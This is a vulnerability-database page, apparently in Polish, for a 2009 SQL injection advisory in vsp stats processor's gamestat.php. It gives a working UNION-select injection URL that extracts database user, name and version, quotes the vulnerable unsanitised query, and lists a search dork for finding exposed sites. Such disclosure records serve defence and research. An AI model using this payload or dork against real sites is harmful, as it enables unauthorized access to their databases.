Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
vsp stats processor 0.45 (gamestat.php gameID) SQL Injection Vuln
2009-04-02 / 2009-04-03
Credit:
Dimi4
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2009-1224
CWE:
CWE-89
Dork:
\"powered by vsp stats processor\"
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
######################################## # # # Product : vsp stats processor # # Version : all # # Dork : "powered by vsp stats processor" # # Site: http://www.scivox.net/vsp/ # # Found by: Dimi4 # # Date : 31.03.09 # # Greetz: antichat # # # ######################################## SQL-injection [+] URL: http://target.com/vsp-core/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x203a20,user(),database(),version()),2/*&config=cfg-default.php [+] Output: <option> {DATA} </option> Bug Function: (vsp-core\pub\themes\bismarck\gamestat.php 540-558 lines) function getStatsGame() { global $db; global $ggame; $sql = "select name, value from {$GLOBALS['cfg']['db']['table_prefix']}gamedata where gameID=$GLOBALS[gameID] "; //echo $sql; $rs = $db->Execute($sql); ..... } (c) Dimi4, 2009 greetz to antichat
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top